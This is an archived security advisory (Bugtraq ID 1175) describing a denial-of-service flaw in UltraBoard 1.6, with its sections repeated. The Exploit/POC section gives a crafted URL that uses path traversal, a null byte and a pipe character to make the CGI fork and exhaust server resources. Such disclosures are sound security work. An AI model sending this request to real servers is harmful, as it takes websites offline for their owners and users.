UltraBoard DoS Vulnerability
BID:1175
Info
UltraBoard DoS Vulnerability
| Bugtraq ID: | 1175 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | May 05 2000 12:00AM |
| Updated: | May 05 2000 12:00AM |
| Credit: | Posted to Bugtraq on May 5, 2000 by Juan M. Bello Rivas <[email protected]> |
| Vulnerable: |
UltraScripts UltraBoard 1.6 |
| Not Vulnerable: | |
Discussion
UltraBoard DoS Vulnerability
UltraBoard 1.6 (and possibly all 1.x versions and the new beta Ultraboard 2000) are vulnerable to this Denial of Service attack.
A remote user is able to expend all of the available resources of the webserver by using a specially-devised request to the CGI. This request causes a fork, which will then consume the processor time and memory of the server.
UltraBoard 1.6 (and possibly all 1.x versions and the new beta Ultraboard 2000) are vulnerable to this Denial of Service attack.
A remote user is able to expend all of the available resources of the webserver by using a specially-devised request to the CGI. This request causes a fork, which will then consume the processor time and memory of the server.
Exploit / POC
UltraBoard DoS Vulnerability
http:://target/ultraboard.pl?request=Session=../UltraBoard.pl%00%7c
http:://target/ultraboard.pl?request=Session=../UltraBoard.pl%00%7c
Solution / Fix
UltraBoard DoS Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].